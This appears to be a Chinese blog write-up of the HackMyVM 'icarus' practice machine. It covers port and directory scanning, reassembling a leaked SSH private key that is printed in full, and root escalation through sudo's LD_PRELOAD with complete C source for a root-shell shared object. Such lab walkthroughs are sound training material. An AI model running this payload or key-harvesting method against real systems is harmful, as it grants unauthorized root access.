news 2026/1/1 10:27:35

【打靶日记】HackMyVm 之 icarus

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【打靶日记】HackMyVm 之 icarus

主机发现

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# arp-scan -I eth1 -l192.168.56.146 08:00:27:d5:6a:34 PCS Systemtechnik GmbH

主机地址为:192.168.56.146

端口扫描

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# nmap -p- 192.168.56.146PORT STATE SERVICE22/tcpopenssh80/tcpopenhttp

80端口探测

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146<!doctype html><htmllang="en"><title>LOGIN</title><formclass="form-signin"action="check.php"method="post"><inputtype="text"autocomplete="off"id="user"name="user"name="user"placeholder="Username"required autofocus><inputtype="password"name="password"id="password"placeholder="Password"required><inputtype="submit"value="Sign in"></form></body></html>

一个表单登录

目录枚举

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# dirsearch -u http://192.168.56.146[00:51:36]Starting:[00:51:41]200- 9KB - /a[00:51:51]200- 21B - /check.php[00:52:02]302- 0B - /login.php ->index.php[00:52:23]200- 1B - /xml Task Completed

收集泄露信息

访问

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/aa xaa xab(....)xzbta xzbtb xzbtc ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/check.phpMan, youmakeme cry. ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xmlK

随便测试几个,发现有返回结果

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xaa- ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xab- ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xzabcO

获取id_rsa

#获取数据,清洗第一行的a,获取id_rsa┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/a > dir.txt% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed10096411009641001752k0--:--:-- --:--:-- --:--:-- 1883k ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# cat dir.txt| wc -l1825┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# tail -1823 dir.txt > dir2.txt┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# for i in $(cat dir2.txt);do curl 192.168.56.146/$i >> id; done

查看id文件

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# cat id-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEA5xagxLiN5ObhPjNcs2I2ckcYrErKaunOwm40kTBnJ6vrbdRYHteS afNWC6xFFzwO77+Kze229eK4ddZcwmU0IdN02Y8nYrxhl8lOc+e5T0Ajz+tRmLGoxJVPsS TzKBERlWpKuJoGO/CEFLOv6PP6s79YYzZFpdUjaczY96jgICftzNZS+VkBXuLjKr79h4Tw z7BK4V6FEQY0hwT8NFfNrF3x3VPe0UstdiUJFl4QV/qAPlHVhPd0YUEPr/95mryjuGi1xw P7xVFrYyjLfPepqYHiS5LZxFewLWhhSjBOI0dzf/TwiNRnVGTZhB3GemgEIQRAam26jkZZ 3BxkrUVckQAAA8jfk7Jp35OyaQAAAAdzc2gtcnNhAAABAQDnFqDEuI3k5uE+M1yzYjZyRx isSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydi vGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzN j3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX +oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9P CI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyRAAAAAwEAAQAAAQEAvdjwMU1xfTlUmPY3 VUP9ePsBwSIck6ML8t35H8KFLKln3C4USxpNNe/so+BeTo1PtBVHYpDFu9IMOvrl7+qW3q dLGyUpdUtQXhPK+RvJONt30GwB+BEUlpQYCW9SuHr1WCwfwPMA5iNdT2ijvx0ZvKwZYECJ DYlB87yQDz7VCnRTiQGP2Mqiiwb7vPd/t386Y+cAz1cVl7BnHzWWJTUTkKCwijnvjYrD0o tTQX4sGd6CrI44g+L8hnYuCZz+a0j6IyUfXJqj6l+/Z2Af7pJjbJD3P28xX7eY0h1Cec2l /sb7qg2wy0qJNywJ35l8bZzZKjkXztPLOqMFQ6Fh0BqSdQAAAIEAlaH0ZEzJsZoR3QqcKl xRKjVcuQCwcrKlNbJu2qRuUG812CLb9jJxJxacJPBV0NS832c+hZ3BiLtA5FwCiGlGq5m5 HS3odf3lLXDfIK+pur4OWKBNLDxKbqi4s4M05vR4gHkmotiH9eWlCNuqL46Ip5H1vFXeJM pLRLN0gqOGuQQAAACBAPfffuhidAgUZH/yTvATKC5lcGrE7bkpOq+6XMMgxEQl0Hzry76i rGXkhTY4QUtthYo4+g7jiDzKlbeaS7aN8RYq38GzQnZZQcSdvL1yB/N554gQvzJLvmKQbm gLhMRcdDmifUelJYXib2Mjg/BLaRXaEzOomUKR2nyJH7VgU+xzAAAAgQDuqkBp44indqhx wrzbfeLnzQqpZ/rMZXGcvJUttECRbLRfohUftFE5J0PKuT8w0dpacNCVgkT9A0Tc3xRfky ECBQjeKLvdhcufJhQl0pdXDt1cpebE50LE4yHc8vR6FEjhR4P2AbGICJyRS7AX7UnrOWdUIE3FeNP0r5UiSDq16wAAAA1pY2FydXNAaWNhcnVzAQIDBA==-----END OPENSSH PRIVATE KEY-----

获取用户名

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# chmod 600 id┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# ssh-keygen -y -f idssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnFqDEuI3k5uE+M1yzYjZyRxisSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydivGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzNj3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX+oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9PCI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyR icarus@icarus

登录icarus

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# ssh icarus@192.168.56.146 -i idicarus@icarus:~$iduid=1000(icarus)gid=1000(icarus)groups=1000(icarus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

成功获得icarus用户权限

user.txt

icarus@icarus:~$catuser.txt Dontgotothesun

提权

icarus@icarus:~$sudo-l Matching Defaults entriesforicarus on icarus: env_reset, mail_badpass,env_keep+=LD_PRELOAD,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User icarus may run the following commands on icarus:(ALL:ALL)NOPASSWD: /usr/bin/id

其中有"env_keep+=LD_PRELOAD"

┌──(root㉿xhh)-[~/Desktop/some/setenv] └─# cat pe.c #include<stdio.h> #include<sys/types.h> #include<stdlib.h> #include<unistd.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }

编译好pe.so文件

icarus@icarus:~$lsflag.sh pe.so user.txt icarus@icarus:~$sudoLD_PRELOAD=./pe.soidroot@icarus:/home/icarus# iduid=0(root)gid=0(root)groups=0(root)

成功获得root用户权限

其中,sudo的版本为“Sudo version 1.8.27”,靶机版本sudo过低,存在CVE-2021-3156

root.txt

root@icarus:~# cat root.txtRIPicarus
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2025/12/16 3:19:40

9 个降AI率工具,本科生论文必备!

9 个降AI率工具&#xff0c;本科生论文必备&#xff01; 论文被AI检测“亮红灯”&#xff0c;本科生的焦虑谁懂&#xff1f; 对于许多本科生来说&#xff0c;写论文从来都不是一件轻松的事。从选题到开题&#xff0c;从查资料到写大纲&#xff0c;每一个环节都充满了挑战。而最…

作者头像 李华
网站建设 2025/12/17 10:55:55

9 个降AI率工具,本科生开题报告AI助手推荐

9 个降AI率工具&#xff0c;本科生开题报告AI助手推荐 论文写作的“重灾区”&#xff1a;降重难题让本科生苦不堪言 对于大多数本科生来说&#xff0c;撰写开题报告是大学阶段最令人头疼的任务之一。它不仅需要大量的文献查阅和资料整理&#xff0c;更要在规定字数内清晰地表达…

作者头像 李华
网站建设 2025/12/16 3:18:45

数据库查询的调试艺术:从403 Forbidden到成功

在软件开发过程中,数据库调试是一个常见的挑战,尤其是在没有直接访问开发和测试数据库的情况下。本文将探讨一个真实的案例,分析并解决一个有趣的数据库调试问题。 问题背景 在项目中,开发人员常常无法直接访问开发和测试数据库,这使得调试变得非常困难。为了解决这个问…

作者头像 李华
网站建设 2025/12/16 3:18:16

Dify智能体平台插件开发对接Qwen3-32B功能扩展

Dify智能体平台插件开发对接Qwen3-32B功能扩展 在企业级AI应用快速落地的今天&#xff0c;一个核心矛盾日益凸显&#xff1a;如何在保障模型性能的同时控制部署成本与数据安全&#xff1f;闭源大模型虽然能力强大&#xff0c;但高昂的调用费用、黑箱式服务以及敏感信息外泄风险…

作者头像 李华
网站建设 2025/12/16 3:15:54

基于Jenkins自动化CI/CD的LLama-Factory微调任务调度实践

基于Jenkins自动化CI/CD的LLama-Factory微调任务调度实践 在AI研发节奏日益加快的今天&#xff0c;企业对大语言模型&#xff08;LLM&#xff09;的定制化需求不断攀升。然而&#xff0c;一个现实问题摆在面前&#xff1a;每次微调都得手动配置环境、检查依赖、运行脚本、监控日…

作者头像 李华
网站建设 2025/12/16 3:15:41

开源大模型微调新利器:LLama-Factory全参数训练支持多GPU分布式部署

开源大模型微调新利器&#xff1a;LLama-Factory全参数训练支持多GPU分布式部署 在当前大语言模型&#xff08;LLMs&#xff09;快速渗透各行各业的背景下&#xff0c;如何高效、低成本地将预训练模型适配到具体业务场景&#xff0c;已成为开发者和企业最关心的问题之一。传统微…

作者头像 李华